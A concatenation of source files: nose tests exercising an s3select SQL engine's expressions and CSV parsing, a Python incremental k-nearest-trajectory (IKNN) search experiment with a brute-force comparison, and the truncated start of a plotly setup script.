res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0),sum(int(_1)),sum(int(_2)) from stdin where (int(_1)-int(_2)) == 4;" ) )
count,sum1,sum2,d = res_s3select.split(",")
nose.tools.assert_equal( int(count)*4 , int(sum1)-int(sum2) )
@attr('s3select')
def test_nullif_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_nullif = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where nullif(_1,_2) is null ;") ).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where _1 == _2 ;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_nullif, res_s3select)
res_s3select_nullif = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where not nullif(_1,_2) is null ;") ).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where _1 != _2 ;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_nullif, res_s3select)
res_s3select_nullif = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where nullif(_1,_2) == _1 ;") ).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where _1 != _2 ;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_nullif, res_s3select)
@attr('s3select')
def test_lowerupper_expressions():
csv_obj = create_random_csv_object(1,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select lower("AB12cd$$") from stdin ;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, "ab12cd$$,")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select upper("ab12CD$$") from stdin ;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, "AB12CD$$,")
@attr('s3select')
def test_in_expressions():
    # purpose of test: the engine processes the IN-predicate correctly
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) in(1);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) == 1;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) in(1,0);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) == 1 or int(_1) == 0;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2) in(1,0,2);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2) == 1 or int(_2) == 0 or int(_2) == 2;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2)*2 in(int(_3)*2,int(_4)*3,int(_5)*5);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2)*2 == int(_3)*2 or int(_2)*2 == int(_4)*3 or int(_2)*2 == int(_5)*5;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where characterlength(_1) == 2 and substr(_1,2,1) in ("3");')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where _1 like "_3";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
@attr('s3select')
def test_like_expressions():
csv_obj = create_random_csv_object_string(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _1 like "%aeio%";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_1,11,4) == "aeio" ;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _1 like "cbcd%";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_1,1,4) == "cbcd";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _3 like "%y[y-z]";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_3,charlength(_3),1) between "y" and "z" and substr(_3,charlength(_3)-1,1) == "y";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _2 like "%yz";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_2,charlength(_2),1) == "z" and substr(_2,charlength(_2)-1,1) == "y";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _3 like "c%z";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_3,charlength(_3),1) == "z" and substr(_3,1,1) == "c";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _2 like "%xy_";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_2,charlength(_2)-1,1) == "y" and substr(_2,charlength(_2)-2,1) == "x";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
@attr('s3select')
def test_complex_expressions():
    # purpose of test: the engine processes correctly several projections containing aggregation functions
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_1)),max(int(_2)),min(int(_3))+1 from stdin;")).replace("\n","")
min_1 = min ( create_list_of_int( 1 , csv_obj ) )
max_2 = max ( create_list_of_int( 2 , csv_obj ) )
min_3 = min ( create_list_of_int( 3 , csv_obj ) ) + 1
__res = "{},{},{},".format(min_1,max_2,min_3)
    # assert is according to the random-csv function
nose.tools.assert_equal( res_s3select, __res )
    # purpose of test: all where conditions select the same group of values, and thus produce the same result
res_s3select_substr = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select min(int(_2)),max(int(_2)) from stdin where substr(_2,1,1) == "1"')).replace("\n","")
res_s3select_between_numbers = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select min(int(_2)),max(int(_2)) from stdin where int(_2)>=100 and int(_2)<200')).replace("\n","")
res_s3select_eq_modolu = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select min(int(_2)),max(int(_2)) from stdin where int(_2)/100 == 1 or int(_2)/10 == 1 or int(_2) == 1')).replace("\n","")
nose.tools.assert_equal( res_s3select_substr, res_s3select_between_numbers)
nose.tools.assert_equal( res_s3select_between_numbers, res_s3select_eq_modolu)
@attr('s3select')
def test_alias():
    # purpose: compare the results of exactly the same queries, one using aliases and one without.
    # this test sets aliases on 3 projections; the third projection uses the other projections' aliases, and the where clause uses aliases as well.
    # the test validates that the where-clause and the projections execute aliases correctly; bear in mind that each alias has its own cache,
    # and that cache needs to be invalidated for every new row.
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(_1) as a1, int(_2) as a2 , (a1+a2) as a3 from stdin where a3>100 and a3<300;") ).replace(",","")
res_s3select_no_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(_1),int(_2),int(_1)+int(_2) from stdin where (int(_1)+int(_2))>100 and (int(_1)+int(_2))<300;") ).replace(",","")
nose.tools.assert_equal( res_s3select_alias, res_s3select_no_alias)
@attr('s3select')
def test_alias_cyclic_refernce():
number_of_rows = 10000
    # purpose of test is to validate that the s3select-engine is able to detect a cyclic reference to an alias.
csv_obj = create_random_csv_object(number_of_rows,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(_1) as a1,int(_2) as a2, a1+a4 as a3, a5+a1 as a4, int(_3)+a3 as a5 from stdin;") )
find_res = res_s3select_alias.find("number of calls exceed maximum size, probably a cyclic reference to alias")
assert int(find_res) >= 0
@attr('s3select')
def test_datetime():
    # purpose of test is to validate that the date-time functionality is correct,
    # by creating the same groups with different (nested) functions, which should produce the same result
csv_obj = create_csv_object_for_datetime(10000,1)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_date_time = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where extract("year",timestamp(_1)) > 1950 and extract("year",timestamp(_1)) < 1960;') )
res_s3select_substr = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where int(substr(_1,1,4))>1950 and int(substr(_1,1,4))<1960;') )
nose.tools.assert_equal( res_s3select_date_time, res_s3select_substr)
res_s3select_date_time = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where datediff("month",timestamp(_1),dateadd("month",2,timestamp(_1)) ) == 2;') )
res_s3select_count = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin;') )
nose.tools.assert_equal( res_s3select_date_time, res_s3select_count)
res_s3select_date_time = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where datediff("year",timestamp(_1),dateadd("day", 366 ,timestamp(_1))) == 1 ;') )
nose.tools.assert_equal( res_s3select_date_time, res_s3select_count)
    # validate that utcnow integrates correctly with other date-time functions
res_s3select_date_time_utcnow = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where datediff("hours",utcnow(),dateadd("day",1,utcnow())) == 24 ;') )
nose.tools.assert_equal( res_s3select_date_time_utcnow, res_s3select_count)
@attr('s3select')
def test_csv_parser():
    # purpose: test the default csv meta-characters (, \n " \ ); the returned value may contain meta-characters
    # NOTE: the default meta-characters for s3select are also meta-characters for python, thus in one example a double \ is mandatory
csv_obj = ',first,,,second,third="c31,c32,c33",forth="1,2,3,4",fifth="my_string=\\"any_value\\" , my_other_string=\\"aaaa,bbb\\" ",' + "\n"
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
    # return value contains comma{,}
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _6 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, 'third="c31,c32,c33",')
    # return value contains comma{,}
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _7 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, 'forth="1,2,3,4",')
    # return value contains comma{,} and quote{"}; the escape-rule{\} bypasses the quote{"}, and the escape{\} itself is removed.
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _8 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, 'fifth="my_string="any_value" , my_other_string="aaaa,bbb" ",')
# return NULL as first token
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _1 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
# return NULL in the middle of line
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _3 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
# return NULL in the middle of line (successive)
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _4 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
# return NULL at the end line
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _9 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, ',')
@attr('s3select')
def test_csv_definition():
number_of_rows = 10000
#create object with pipe-sign as field separator and tab as row delimiter.
csv_obj = create_random_csv_object(number_of_rows,10,"|","\t")
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
    # purpose of test is to correctly parse input with different csv definitions
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin;","|","\t") ).replace(",","")
nose.tools.assert_equal( number_of_rows, int(res))
    # assert is according to the random-csv function
    # purpose of test is to validate that tokens are processed correctly
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_1)),max(int(_2)),min(int(_3))+1 from stdin;","|","\t") ).replace("\n","")
min_1 = min ( create_list_of_int( 1 , csv_obj , "|","\t") )
max_2 = max ( create_list_of_int( 2 , csv_obj , "|","\t") )
min_3 = min ( create_list_of_int( 3 , csv_obj , "|","\t") ) + 1
__res = "{},{},{},".format(min_1,max_2,min_3)
nose.tools.assert_equal( res_s3select, __res )
@attr('s3select')
def test_schema_definition():
number_of_rows = 10000
# purpose of test is to validate functionality using csv header info
csv_obj = create_random_csv_object(number_of_rows,10,csv_schema="c1,c2,c3,c4,c5,c6,c7,c8,c9,c10")
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
    # ignore the schema on the first line and retrieve values using generic column numbers
res_ignore = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _1,_3 from stdin;",csv_header_info="IGNORE") ).replace("\n","")
    # use the schema on the first line; the query uses the attached schema
res_use = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select c1,c3 from stdin;",csv_header_info="USE") ).replace("\n","")
# result of both queries should be the same
nose.tools.assert_equal( res_ignore, res_use)
    # using a column-name that does not exist in the schema
res_multiple_defintion = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select c1,c10,int(c11) from stdin;",csv_header_info="USE") ).replace("\n","")
assert res_multiple_defintion.find("alias {c11} or column not exist in schema") > 0
# alias-name is identical to column-name
res_multiple_defintion = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(c1)+int(c2) as c4,c4 from stdin;",csv_header_info="USE") ).replace("\n","")
assert res_multiple_defintion.find("multiple definition of column {c4} as schema-column and alias") > 0
@attr('s3select')
def test_when_than_else_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select case when ((4*3)==(12)) than "case_1_2" else "case_2_1" end from stdin where (3*3==9);') ).replace("\n","")
nose.tools.assert_equal( res_s3select, "case_1_2,")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select case when cast(_1 as int)>100 and cast(_1 as int)<200 than "(100-200)" when cast(_1 as int)>200 and cast(_1 as int)<300 than "(200-300)" else "NONE" end from s3object;') ).replace("\n","")
count1 = res_s3select.count("(100-200)")
count2 = res_s3select.count("(200-300)")
count3 = res_s3select.count("NONE")
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_1 as int)>100 and cast(_1 as int)<200 ;') ).replace("\n","")
res1 = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_1 as int)>200 and cast(_1 as int)<300 ;') ).replace("\n","")
res2 = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_1 as int)<=100 or cast(_1 as int)>=300 or cast(_1 as int)==200 ;') ).replace("\n","")
nose.tools.assert_equal( str(count1) + ',', res)
nose.tools.assert_equal( str(count2) + ',', res1)
nose.tools.assert_equal( str(count3) + ',', res2)
@attr('s3select')
def test_coalesce_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where char_length(_3)>2 and char_length(_4)>2 and cast(substr(_3,1,2) as int) == cast(substr(_4,1,2) as int);') ).replace("\n","")
res_null = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_3 as int)>99 and cast(_4 as int)>99 and coalesce(nullif(cast(substr(_3,1,2) as int),cast(substr(_4,1,2) as int)),7) == 7;' ) ).replace("\n","")
nose.tools.assert_equal( res_s3select, res_null)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select coalesce(nullif(_5,_5),nullif(_1,_1),_2) from stdin;') ).replace("\n","")
res_coalesce = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select coalesce(_2) from stdin;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, res_coalesce)
@attr('s3select')
def test_cast_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_3 as int)>999;') ).replace("\n","")
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where char_length(_3)>3;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, res)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where cast(_3 as int)>99 and cast(_3 as int)<1000;') ).replace("\n","")
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from s3object where char_length(_3)==3;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, res)
@attr('s3select')
def test_version():
    return  # disabled: the checks below are kept for reference but never executed
number_of_rows = 1
# purpose of test is to validate functionality using csv header info
csv_obj = create_random_csv_object(number_of_rows,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_version = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select version() from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_version, "41.a," )
``` |
{
"source": "Joke-Lin/IKNN-Experiment",
"score": 3
} |
#### File: Joke-Lin/IKNN-Experiment/iknn.py
```python
import numpy as np
import math
import random
import queue
import matplotlib.pyplot as plt
from quadTree import *
import os
from time import time  # used by main() and testDifferentIKNN() below
import preprocess
from knn import *
from createTrajectories import *
# Find the K nearest neighbors of every query point
def findKNN(Q:list,tree:QuadTree,K:int,datasetDict:dict):
res = []
for qi in Q:
        # find the K nearest points for qi
resi = knn(datasetDict[qi],K,tree,datasetDict)
res.append(resi)
return res
# Randomly generate a query sequence consisting of K neighboring points
def generateQuery(K:int, tree:QuadTree,datasetDict:dict)->list:
begin = random.randint(0,tree.root.pointsNum-1)
    # find the other two nearest points; together with the starting point they form the query point set
res = knn(datasetDict[begin],K,tree,datasetDict)
return res
# Find the trajectories that the KNN points of the query points pass through
# The first parameter is a list of lists; each inner list is the KNN point set of one query point qi
def findTrajectroy(points:list,point2tra:dict)->set:
    # union of all the trajectories found
res = set()
    for pp in points:  # the KNN point set found for each query point
        for p in pp:  # each KNN point
            # skip points that do not lie on any trajectory
if p not in point2tra:
continue
            for ti in point2tra[p]:  # the trajectories this point lies on
res.add(ti)
return res
# Compute the upper bound for an already-scanned trajectory
# t: key of the current trajectory; points: list of KNN point sets, one per query point
def UB(t:int,tra2point:dict,point2tra:dict,Query:list,points:list,datasetDict:dict)->float:
sum = 0
    # the KNN point set retrieved for the corresponding query point
for index in range(len(Query)):
qi = Query[index]
pp = points[index]
mindistance = 0xffffffff
        for p in pp:  # for each K-nearest point, check whether it lies on trajectory t; if so, update the minimum distance
            # skip the point if it does not lie on any trajectory
if p not in point2tra:
continue
            # check whether the point lies on the current trajectory
if isExist(point2tra[p],t):
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist < mindistance:
mindistance = curdist
        # if no point lies on the current trajectory, use the largest distance as the current sim(qi,Rx);
        # that value is guaranteed to be no smaller than the true one, hence an upper bound
if mindistance == 0xffffffff:
maxdistance = -100
            for p in pp:  # for each K-nearest point, simply find the farthest one
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist > maxdistance:
maxdistance = curdist
sum += math.exp(-maxdistance)
else:
sum += math.exp(-mindistance)
return sum
# Compute the upper bound for the trajectories that have not been scanned yet
def UBn(Query:list,points:list,datasetDict:dict)->float:
sum = 0
    # the KNN point set retrieved for the corresponding query point
for index in range(len(Query)):
qi = Query[index]
pp = points[index]
maxdistance = -100
        for p in pp:  # for each K-nearest point, simply find the farthest one
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist > maxdistance:
maxdistance = curdist
sum += math.exp(-maxdistance)
return sum
# Compute the lower bound of one trajectory with respect to the query points
# Parameters: trajectory index, trajectory-to-point mapping, point-to-trajectory mapping, query point set, KNN sets of the query points
def LB(t:int,tra2point:dict,point2tra:dict,Query:list,points:list,datasetDict:dict)->float:
sum = 0
    # the KNN point set retrieved for the corresponding query point
for index in range(len(Query)):
qi = Query[index]
pp = points[index]
mindistance = 0xffffffff
        for p in pp:  # for each K-nearest point, check whether it lies on trajectory t; if so, update the minimum distance
            # skip the point directly if it does not lie on any trajectory
if p not in point2tra:
continue
            # check whether the point lies on the current trajectory
if isExist(point2tra[p],t):
curdist = euclidianDistance(datasetDict[p],datasetDict[qi])
if curdist < mindistance:
mindistance = curdist
        # if no point lies on the current trajectory, leave the sum unchanged
if mindistance == 0xffffffff:
sum += 0
else:
sum += math.exp(-mindistance)
return sum
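# Editor's note: for every scanned trajectory t, LB(t) <= Similarity(Q, t) <= UB(t).
# The IKNN routine below relies on this sandwich: it keeps enlarging the KNN search
# until the smallest of the K largest lower bounds is at least UBn, the upper bound
# of any trajectory not seen yet, at which point the unseen trajectories can be pruned.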
# Check whether the given trajectory is present in a collection of trajectories
def isExist(T:list,t:int)->bool:
for ti in T:
if ti == t:
return True
return False
# Element type used by the refine function
class K_BCT_element():
def __init__(self,t:int,Sim:float):
self.sim = Sim
self.t = t
def __lt__(self,other):
return self.sim < other.sim
# Similarity between a group of query points and a single trajectory
def Similarity(Q:list,T:list,datasetDict:dict):
sum = 0
for q in Q:
mindist = 0xffffffff
for pi in T:
curdist = euclidianDistance(datasetDict[q],datasetDict[pi])
if curdist < mindist:
mindist = curdist
sum += math.exp(-mindist)
return sum
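# Editor's note - in formula form, the similarity computed above is
#   Sim(Q, T) = sum over q in Q of exp( - min over p in T of dist(q, p) )
# i.e. each query point contributes according to its closest point on the trajectory.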
# Produce the final result set by exact computation
# C: the candidate trajectory set
def refine(C:list,K:int,tra2point:dict,point2tra:dict,Query:list,points:list,datasetDict:dict)->list:
# print('Candidates length:',len(C))
res = []
Candidates = []
    # compute the upper bound of every candidate trajectory
for t in C:
Sim = UB(t,tra2point,point2tra,Query,points,datasetDict)
        # add to the Candidates list so it can be sorted later
Candidates.append(K_BCT_element(t,Sim))
    # sort by UB in descending order
Candidates = sorted(Candidates,key = lambda ele:ele.sim,reverse = True)
    # traverse Candidates from the largest UB to the smallest
for i in range(len(Candidates)):
        # compute the exact similarity and update it
Sim_i = Similarity(Query,tra2point[Candidates[i].t],datasetDict)
Candidates[i].sim = Sim_i
        # the first K trajectories are taken directly, no comparison needed
if i < K:
res.append(Candidates[i])
else:
            # sort the K selected results in ascending order; if the current similarity is greater than the smallest selected one, replace it
res.sort(key = lambda ele:ele.sim)
if Sim_i > res[0].sim:
res[0] = Candidates[i]
            res.sort(key = lambda ele:ele.sim)  # sort again so the next check can use the ordering
        # if this is already the last element, or the smallest similarity in the selected set is no smaller than the next element's UB, stop checking (UB is sorted in descending order)
if i == len(Candidates) - 1 or res[0].sim >= Candidates[i+1].sim:
            # save the final trajectory keys as a list and return it
result = []
for ele in res:
result.append(ele.t)
return result
result = []
for ele in res:
result.append(ele.t)
return result
# The core incremental KNN function
# Inputs: the list of query points and the number of trajectories to retrieve
def IKNN(Query:list,K:int,point2tra:dict,tra2point:dict,tree:QuadTree,datasetDict:dict)->list:
    # step size of each expansion, also the initial KNN size
delta = len(Query)*K
y = delta
while True:
        # retrieve the KNN point sets
points = findKNN(Query,tree,y,datasetDict)
        # compute the candidate trajectory set
C = findTrajectroy(points,point2tra)
        # examine the candidate trajectory set
if len(C) >= K:
            # lower bound of each trajectory in the candidate set
Lowerbound = []
for t in C:
Lowerbound.append( LB(t,tra2point,point2tra,Query,points,datasetDict) )
            # upper bound of the unscanned trajectories
Upperbound = UBn(Query,points,datasetDict)
Lowerbound.sort()
            # take the K largest lower bounds with a list slice
k_LB = Lowerbound[-K:]
            # if even the smallest of these lower bounds is at least the upper bound, no further comparison is needed
if k_LB[0] >= Upperbound:
                # refine with exact computation to obtain the final trajectory set
K_BCT = refine(C,K,tra2point,point2tra,Query,points,datasetDict)
return K_BCT
        # fewer than K trajectories found: enlarge the search range and search again
y = y + delta
class ForceItem():
def __init__(self,t:int,Sim:float):
self.sim = Sim
self.t = t
def __lt__(self,other):
return self.sim < other.sim
# Brute-force traversal to find the most similar trajectories
def forceIKNN(Query:list, K:int, tra2point:dict, datasetDict:dict)->list:
res = queue.PriorityQueue()
for index,tra in tra2point.items():
sim = Similarity(Query,tra,datasetDict)
tempNode = ForceItem(index, sim)
if K > 0:
res.put(tempNode)
K = K - 1
else:
temp = res.get()
if tempNode.sim > temp.sim:
res.put(tempNode)
else:
res.put(temp)
resList = []
while not res.empty():
resList.append(res.get().t)
return resList
# Show one example
def showOneExample(tra2point, point2tra, tree, datasetDict):
plt.figure(1)
dataSet = preprocess.readDataSet()
preprocess.drawPoints(dataSet)
for points in tra2point.values():
temp = [datasetDict[x] for x in points]
temp = np.array(temp)
x, y = temp[:, 0], temp[:, 1]
plt.plot(x, y, linewidth=1, color="silver")
Query = generateQuery(10,tree,datasetDict)
K = 10
C = IKNN(Query, K, point2tra, tra2point,tree, datasetDict)
temp = []
for i in Query:
temp.append(datasetDict[i])
temp = np.array(temp)
x, y = temp[:, 0], temp[:, 1]
plt.plot(x, y, linewidth=3,color='black')
for index in C:
points = tra2point[index]
temp = [datasetDict[x] for x in points]
temp = np.array(temp)
x, y = temp[:, 0], temp[:, 1]
plt.plot(x, y, linewidth=2)
# Check the algorithm's correctness by comparing against brute force
def testIKNNResultIsRight(tra2point, point2tra, tree, datasetDict):
K = 10
Query = generateQuery(10,tree,datasetDict)
C = forceIKNN(Query, K, tra2point, datasetDict)
C.sort()
print(C)
C = IKNN(Query, K, point2tra, tra2point,tree, datasetDict)
C.sort()
print(C)
# Compare IKNN and brute force for different numbers of requested trajectories
def testDifferentIKNN(tra2point, point2tra, tree, datasetDict):
plt.figure(2)
x = range(1,150,3)
    times = 3  # measure each setting this many times
Query = generateQuery(10,tree,datasetDict)
    # brute force first
y = []
for k in x:
s = time()
for i in range(times):
forceIKNN(Query, k, tra2point, datasetDict)
e = time()
y.append((e-s)/times)
plt.plot(x, y, color="black", label="Force Search")
y = []
for k in x:
s = time()
for i in range(times):
IKNN(Query, k, point2tra, tra2point,tree, datasetDict)
e = time()
y.append((e-s)/times)
plt.plot(x, y, color="red", label="IKNN")
plt.xlabel("Search Trajectories' Number")
plt.ylabel("Average Time")
def main():
if not os.path.exists(preprocess.dataSetPath) and not os.path.exists(preprocess.newDataSetPath):
print("Error:","dataSetPath","not exist")
return
if not os.path.exists(preprocess.newDataSetPath):
preprocess.writeDataSetToFile()
if not os.path.exists(outfilep2tra) or not os.path.exists(outfiletra2p):
save()
tra2point, point2tra, tree, datasetDict = load()
testIKNNResultIsRight(tra2point, point2tra, tree, datasetDict)
    # visualize one example
showOneExample(tra2point, point2tra, tree, datasetDict)
    # efficiency test; commented out by default because it takes a long time
# testDifferentIKNN(tra2point, point2tra, tree, datasetDict)
plt.show()
if __name__ == "__main__":
main()
``` |
{
"source": "jokem59/Overwatch-Sentiment",
"score": 3
} |
#### File: jokem59/Overwatch-Sentiment/plotlySetup.py
```python
import plotly.plotly as py
import plotly.tools as tls
import plotly.graph_objs as go
import time
def setupPlotly(points):
'''
